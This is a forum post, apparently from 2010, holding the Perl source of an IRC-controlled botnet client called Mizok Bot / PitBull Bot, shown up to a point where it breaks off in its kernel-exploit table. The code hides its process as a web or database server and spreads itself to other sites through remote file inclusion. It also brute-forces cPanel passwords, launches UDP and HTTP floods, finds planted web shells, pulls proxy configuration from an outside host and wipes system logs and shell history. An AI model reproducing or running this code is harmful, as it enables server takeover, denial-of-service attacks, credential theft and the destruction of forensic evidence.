Floord
01.07.2010, 17:24
#!/usr/bin/perl
#system 'cd /tmp;rm -rf *';
#
# Mizok Bot V3.2 PRiVaTE Sh3llBoT
#
# Last edited : 12/2/2010
#
#[@[PitBull Bot V5 Commands List]@]
#[@-----[Shellbot/Hacking Based]-----@]
#!bot @admins
#!bot @spread <rfi>
#!bot @milw0rm
#!bot @packetstorm
#!bot @portscan <host>
#!bot @logcleaner
#!bot @md5 <hash>
#!bot @sendmail <subject> <sender> <recipient> <message>
#!bot @vnc <B-Class>
#!bot @boxip
#!bot @socks5
#!bot @cleartmp
#!bot @portchk <host> <port>
#!bot @proxy <a|t|e>
#!bot @rootable
#!bot @modules
#!bot @cpanel <host> <user> <port>
#!bot @visit <url>
#!bot @shellfind <c99/r57/mys/phm/rem>
#[@-----[IRC Based]-----@]
#!bot @join <#channel>
#!bot @part <#channel>
#!bot @quit <reason>
#!bot @voice <who>
#!bot @devoice <who>
#!bot @halfop <who>
#!bot @dehalfop <who>
#!bot @op <who>
#!bot @deop <who>
#!bot @owner <who>
#!bot @deowner <who>
#[@-----[DDos Based]-----@]
#!bot @udpflood <host> <packetsize> <time>
#!bot @httpflood <host> <time>
#!bot @sqlflood <host> <time>
#[@-----[Flooding Based]-----@]
#!bot @msgflood <who>
#!bot @dccflood <who>
#!bot @ctcpflood <who>
#!bot @noticeflood <who>
#!bot @channelflood
#!bot @maxiflood <who>
#[@[PitBull Bot V5 Commands List]@]
#
# Sh3llBoT
#
######################
#print " After installation, Linux requires configuration and systems administration. Corporate systems need monitoring, backups, updates, as well as system and user management. Ubuntu (apt), CentOS, Fedora and Red Hat (rpm/YUM) server and desktop systems adminstration are covered by this script. Please dont exit the script or it will result in a broken linux partition";
######################
# Specify your data:
#--------------------------------------------------------------#
my $max_lines= '10';
my $sleeping= '3';
my $prefix = "shellbot"; # "!" is included :)
my $spread = "http://www.theblackhole.us/forum/chat/inc/cmses/bind/s.txt";
my @admins = ("Vicktor");
my @hostauth= ("Vicktor.ro");
#--------------------------------------------------------------#
$server= 'master.indoirc.net' unless $server;
my $port= '6667';
my @channel= ("#Vicktor");
my @nickname = ("XDCC|");
my $nick = $nickname[rand scalar @nickname];
my $ircname = 'xdcc';
chop (my $realname = "VickT');
#--------------------------------------------------------------#
my $httpmodule;
my $usermodule;
my $lwpmodule;
my $filemodule;
#--------------------------------------------------------------#
my @cpanelpasswds = ("1","12","967qeikt","123","1234","12345","123456","1234567","12345678","123456789","1234567890","admin","root",
"pass","passwd","password","Pass","Passwd","PassWd","PassWord","pwd","login","Admin","admin","test","123123","1212",
"12341234","zxcvbnm","zxcvbn","zxcvb","zxcv","zxc","q1w2e3r4","q1w2e3","q1w2e3r4t5","1q2w3e4r5t","1q2w3e4r","1q2w3e",
"demo","morgan","ferrari","italia","usa","clinton","dart","call","asdf","asdfg","asdfgh","qazwsx","qazxsw","qwertyu",
"qwertyuiop","qwertyuio","qwertyu","qwerty","qwert","qwer","james","hosting","temp","test1","test12","test123","tester",
"testing","cpanel","default","Login","admin.","cpanels","web","master","webmaster","dark","support","darby","mail",
"dick","mary","evil","nissan","toyota","kingkong","superman","super","supra","data","service","server","weed","abc",
"abc123","hello","terror","binladen","europe","website","mypass","pass1","pass12","pass123","pass1234","passwd1");
#--------------------------------------------------------------#
# End here :)
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
eval "use HTTP::Request;"; if ($@) {
$httpmodule= " 4No";
}
else{
$httpmodule= " 4Yes";
}
eval "use LWP::UserAgent;"; if ($@) {
$usermodule= " 4No";
}
else{
$usermodule= " 4Yes";
}
eval "require LWP;"; if ($@) {
$lwpmodule= " 4No";
}
else{
$lwpmodule= " 4Yes";
}
eval "use FileHandle;"; if ($@) {
$filemodule= " 4No";
}
else{
$filemodule= " 4Yes";
}
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
#Connect
$server="$ARGV[0]" if $ARGV[0];
# Real psx! - by xeQt.
my $uid=`id -u`;
if ($uid =~ /^0$/)
{
$0=$xeQters."\0"x16;;
chdir($rootpath);
}
else
{
@processer=`ps x|grep -E "http|httpd|apache|apache2|mysql|postgrep|smbd"`; # Grab from real ps!
foreach $lines (@processer)
{
if (($lines =~ /\/(.+)/)&&($lines !~ /grep/i)&&($lines !~ /perl/i))
{
if (($lines!~/wget/i)&&($lines!~/curl/i)&&($lines!~/fetch/i)&&($lines!~/GET/i)&&($lines!~/lwp-download/i))
{
$bg=$1;
}
}
if (($bg =~ /^\//i) || ($bg =~ /^\/\//i) || ($bg =~ /^[.+?]$/i))
{
$bg="$bg";
}
else
{
$bg="/$bg";
}
if ((length($bg) <= 3) || ($bg =~ /.txt$/i))
{
$bg=$fakeps[rand scalar @fakeps];
}
$0="$bg"."\0"x16;;
chdir($userpath);
}
}
my $pid=fork;
exit if $pid;
die "Error: Fork(): $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {#342
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.31 The_PitBull\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth ) {
if (grep {$_ =~ /^\Q$pn\E$/i } @admins ) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
#-#-#-#-#-#-#-#-#
# PREFIX #
#-#-#-#-#-#-#-#-#
if ($args =~ /^(\Q$meunick\E|\!$prefix)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
}
#-#-#-#-#-#-#-#-#
# NICKNAME OPT.#
#-#-#-#-#-#-#-#-#
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@channel) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
#-#-#-#-#-#-#-#-#
# Commands #
#-#-#-#-#-#-#-#-#
# Show commands of the bot.
if ($funcarg =~ /^commands/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ [PitBull Bot V5 Commands List] 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[Shellbot/Hacking Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1admins ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1spread <rfi> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1milw0rm ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1packetstorm ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1portscan <host> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1logcleaner ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1md5 <hash> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1sendmail <subject> <sender> <recipient> <message> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1vnc <B-Class> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1boxip ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1socks5 ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1cleartmp ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1portchk <host> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1proxy <a|t|e> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1rootable ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1modules ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1cpanel <host> <user> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1visit <url> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1shellfind <c99/r57/mys/phm/rem> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[IRC Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1join <#channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1part <#channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1quit <reason> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1voice <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1devoice <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1halfop <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1dehalfop <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1op <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1deop <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[DDos Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1udpflood <host> <packetsize> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1httpflood <host> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1sqlflood <host> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[Flooding Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1msgflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1dccflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1ctcpflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1noticeflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1channelflood");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1maxiflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ [PitBull Bot V5 Commands List] 4@ 12 ] ");
}
# Shell finder based on the code of DiA/RRLF.
if ($funcarg =~ /^shellfind\s+(.*)/) {
my $type=$1;
my @searchTerm;
my @checkTerm;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ShellFinder 12] Started for finding 4 ".$type." 12shell ");
if($type eq "r57") {
push(@searchTerm, "inurl:r57.php");
push(@searchTerm, "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\"");
push(@searchTerm, "intitle:r57shell");
push(@checkTerm, "r57");
push(@checkTerm, "safe_mode");
}
elsif($type eq "c99") {
push(@searchTerm, "inurl:c99.php");
push(@searchTerm, "\"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout\"");
push(@searchTerm, "intitle:\" - phpshell\"");
push(@searchTerm, "intitle:\" - c99shell\"");
push(@checkTerm, "c99");
push(@checkTerm, "Safe-mode");
}
elsif($type eq "mys") {
push(@searchTerm, "\"Auto error traping enabled\"");
push(@searchTerm, "intitle:\"MyShell 1.1.0 build 20010923\"");
push(@checkTerm, "MyShell");
push(@checkTerm, "Echo commands");
}
elsif($type eq "phs") {
push(@searchTerm, "intitle:\"PHP Shell 1.5\"");
push(@searchTerm, "intitle:\"PHP Shell 1.6\"");
push(@searchTerm, "intitle:\"PHP Shell 1.7\"");
push(@searchTerm, "\"Enable stderr-trapping?\"");
push(@checkTerm, "PHP Shell");
push(@checkTerm, "Choose new working");
}
elsif($type eq "phm") {
push(@searchTerm, "\"PHPShell by Macker\"");
push(@searchTerm, "\"[ Main Menu ] [ PHPKonsole ] [ Haxplorer ]\"");
push(@checkTerm, "Haxplorer");
push(@checkTerm, "PHPKonsole");
}
elsif($type eq "rem") {
push(@searchTerm, "intitle:\"phpRemoteView: \"");
push(@searchTerm, "\"REMVIEW TOOLS\"");
push(@checkTerm, "phpRemoteView");
push(@checkTerm, "perms");
}
my $userAgent = LWP::UserAgent->new;
$userAgent->agent("User-Agent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5");
my @resultLinks;
foreach(@searchTerm) {
my $isLastPage = 0;
for(my $gPage = 0; ; $gPage++) {
if($isLastPage == 1) { last; }
my $gRequest = HTTP::Request->new(GET => "http://www.google.de/search?q=$_&start=$gPage"."0");
my $gResource = $userAgent->request($gRequest);
if($gResource->is_success) {
my @gContent = split("<div class=g>", $gResource->content);
if(@gContent < 10) { $isLastPage = 1; };
for(my $gPiece = 1; $gPiece < @gContent; $gPiece++) {
my $shellLink = substr($gContent[$gPiece], index($gContent[$gPiece], "href=\"") + 6);
$shellLink = substr($shellLink, 0, index($shellLink, "\""));
my $sRequest = HTTP::Request->new(GET => $shellLink);
my $sResource = $userAgent->request($sRequest);
if($sResource->is_success) {
if(index($sResource->content, $checkTerm[0]) != -1 && index($sResource->content, $checkTerm[1]) != -1) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ShellFinder 12] 4 [".$type."] 12Link: 4 ".$shellLink." ");
}
}
}
sleep 20; #wait 20 seconds so google dont think we are a bot
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ShellFinder 12] Google blacklisted! ");
}
}
}
}
# Show admins of the bot.
if ($funcarg =~ /^admins/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Admins 12] The Admins of the bot are : 4 @admins ");
}
# ModuleCheck to c wich we are using
if ($funcarg =~ /^modules/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] HTTP::Request: ".$httpmodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] LWP::Useragent: ".$usermodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] LWP: ".$lwpmodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] FileHandle: ".$filemodule." ");
}
# URL Visitor
if ($funcarg =~ /^visit\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] Visiting");
my $side=$1;
my $set = fix_url($side);
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; }
else {
eval "use HTTP::Request;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] HTTP::Request not found ");
}
eval "use LWP::UserAgent;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] LWP::UserAgent not found ");
}
my $siden=fix_url($side);
my $req=HTTP::Request->new(GET=>$siden);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
my $mrx=$response->content;
if ($response->is_success) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] Visited 4 ".$siden.".");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Error: ".$siden."");
}
}
exit;
}
}
# Spread the bot on a rfi. Make sure that your $spread is configured right !.
if ($funcarg =~ /^spread\s+(.*)/) {
$vuln = $1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Spreader 12] Spreading bot on : 4 $vuln");
my $shellurl="http://".$vuln.$spread."?";
my $reqz=HTTP::Request->new(GET=>$shellurl);
my $ua=LWP::UserAgent->new();
my $response=$ua->request($reqz);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Spreader 12] Bot is Spreaded on : 4 $vuln");
}
# MD5 Decrypter by my friend iNs ;).
if ($funcarg =~ /^md5\s+(.*)/) {
&ice($printl,$1);
&gdata($printl,$1);
&redn($printl,$1);
&xpz($printl,$1);
&ben($printl,$1);
&alim($printl,$1);
&cry($printl,$1);
}
# Get the latest bugs from milw0rm.
if ($funcarg =~ /^milw0rm/) {
my @ltt=();
my @bug=();
my $x;
my $page="";
my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$socke>;
$page="@r";
close($socke);
while ($page =~ m/<title>(.*)</g){
$x = $1;
if ($x =~ /\<\;/) {
$x =~ s/\<\;/</g;
}
if ($x !~ /milw0rm/) {
push (@bug,$x);
}}
while ($page =~ m/<link.*expl.*([0-9]...)</g) {
if ($1 !~ m/milw0rm.com|exploits|en/){
push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
}}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Milw0rm 12] 12 Latest exploits : ");
foreach $x (0..(@ltt - 1)) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Milw0rm 12] 12 $bug[$x] - $ltt[$x]");
sleep 1;
}}
# Get the IP of the box
if ($funcarg =~ /^boxip/) {
$net = `/sbin/ifconfig | grep 'eth0'`;
if (length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
if (!length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
}
if (length($net))
{
chop($net);
@netip = split/:/,$net;
$netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/;
$ip = $1 .".". $2 .".". $3 .".". $4;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ IP 12] 12 IP of B0X : 4 ". $ip ." ");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ IP 12] 12 IP of B0X : 4 Not founded ");
}
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ IP 12] 12 IP of B0X : 4 Error ");
}
}
#cPanel Bruter by xeQt modded by The_PitBull
if ($funcarg =~ /^cpanel\s+(\S+)\s+(\S+)\s+(\d+)/) {
my $haddr=$1;
my $cuser=$2;
my $cport=$3;
my $countcp=0;
eval "use IO::Socket;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] 12 IO::Socket Not Found"); return;
}
eval "use LWP::Simple;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] 12 LWP::Simple Not Found"); return;
}
eval "use MIME::Base64;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] 12 MIME::Base64 Not Found"); return;
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ cPanelBruter 12] 12 Starting Bruter");
foreach my $P (@cpanelpasswds) {
$countcp++;
chomp $P;
$passwd = $P;
$authx = encode_base64($cuser.":".$passwd);
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$haddr", PeerPort => "$cport") || die "Error connect ro host\n";
print $sock "GET / HTTP/1.1\n";
print $sock "Authorization: Basic $authx\n";
print $sock "Connection: Close\n\n";
read $sock, $answer, 128;
close($sock);
if ($answer =~ /Moved/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ cPanelBruter 12] 12 Cracked ".$haddr.":".$cport." - l/p:".$cuser.":".$passwd." - Done.");
return;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ cPanelBruter 12] 12 Tested ".$countcp." password(s) without luck!");
}
#Auto Install Socks V5 using Mocks
if ($funcarg =~ /^socks5/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 Installing Mocks please wait 4");
system 'cd /tmp';
system 'wget http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz';
system 'tar -xvfz mocks-0.0.2.tar.gz';
system 'rm -rf mocks-0.0.2.tar.gz';
system 'cd mocks-0.0.2';
system 'rm -rf mocks.conf';
system 'curl -O http://andromeda.covers.de/221/mocks.conf';
system 'touch mocks.log';
system 'chmod 0 mocks.log';
sleep(2);
system './mocks start';
sleep(4);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 Looks like its succesfully installed lets do the last things 4 ");
#lets grab ip
$net = `/sbin/ifconfig | grep 'eth0'`;
if (length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
if (!length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
}
if (length($net))
{
chop($net);
@netip = split/:/,$net;
$netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/;
$ip = $1 .".". $2 .".". $3 .".". $4;
#and print it ^^
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 Connect here : 4 ". $ip .":8787 ");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 IP not founded ");
}
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 ERROR WHILE INSTALLING MOCKS ");
}
}
# A portscanner, @portscan <host>
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Portscan 12] 12 Scanning for open ports on 4 ".$1." 12 started .");
foreach my $port (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $port, Proto =>
'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $port);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Portscan 12] 12 Open ports founded: @aberta");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Portscan 12] 12 No open ports foundend. ");
}
}
# A logcleaner, most effective when you are uid=0
if ($funcarg =~ /^logcleaner/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ LogCleaner 12] This process can be long, just wait");
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ LogCleaner 12] All default log and bash_history files erased");
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ LogCleaner 12] Now Erasing the rest of the machine log files");
system 'find / -name *.bash_history -exec rm -rf {} \;';
system 'find / -name *.bash_logout -exec rm -rf {} \;';
system 'find / -name "log*" -exec rm -rf {} \;';
system 'find / -name *.log -exec rm -rf {} \;';
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ LogCleaner 12] Done! All logs erased");
}
# A /tmp cleaner
if ($funcarg =~ /^cleartmp/) {
system 'cd /tmp;rm -rf *';
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ TMPCleaner 12] /tmp is Cleaned");
}
# Check if a host have a port open.
if ($funcarg =~ /^portchk\s+(.*)\s+(\d+)/) {
my $host=$1;
my $port=$2;
my $scansock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => 8);
if ($scansock)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PortChk 12] Port: 4 ".$port." 12is open on the host 4 ".$host." ");
$scansock->close;
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PortChk 12] Port: 4 ".$port." 12is closed on the host 4 ".$host." ");
}
}
# Chk The News from PacketStorm
if ($funcarg =~ /^packetstorm/) {
my $c=0;
my $x;
my @ttt=();
my @ttt1=();
my $sock = IO::Socket::INET->new(PeerAddr=>"www.packetstormsecurity.org",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET /whatsnew20.xml HTTP/1.0\r\n";
print $sock "Host: www.packetstormsecurity.org\r\n";
print $sock "Accept: */*\r\n";
print $sock "User-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
while ($page =~ m/<link>(.*)<\/link>/g)
{
push(@ttt,$1);
}
while ($page =~ m/<description>(.*)<\/description>/g)
{
push(@ttt1,$1);
}
foreach $x (0..(@ttt - 1))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PacketStorm 12] ".$ttt[$x]." ".$ttt1[$x]."");
sleep 3;
$c++;
}
}
if ($funcarg =~ /^rootable/) {
my $khost = `uname -r`;
my $currentid = `whoami`;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Currently you are ".$currentid." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] The kernel of this box is ".$khost." ");
chomp($khost);
my %h;
$h{'w00t'} = {
vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4. 16','2.4.20']
};
$h{'brk'} = {
vuln=>['2.4.22','2.4.21','2.4.10','2.4.20']
};
$h{'ave'} = {
vuln=>['2.4.19','2.4.20']
};
$h{'elflbl'} = {
vuln=>['2.4.29']
};
$h{'elfdump'} = {
vuln=>['2.4.27']
};
$h{'expand_stack'} = {
vuln=>['2.4.29']
};
$h{'h00lyshit'} = {
vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13' ,'2.6.14','2.6.15','2.6.16','2.6.2']
};
$h{'kdump'} = {
vuln=>['2.6.13']
};
$h{'km2'} = {
vuln=>['2.4.18','2.4.22']
};
$h{'krad'} = {
vuln=>['2.6.11']
};
$h{'krad3'} = {
vuln=>['2.6.11','2.6.9']
};
$h{'local26'} = {
vuln=>['2.6.13']
};
$h{'loko'} = {
vuln=>['2.4.22','2.4.23','2.4.24']
};
$h{'mremap_pte'} = {
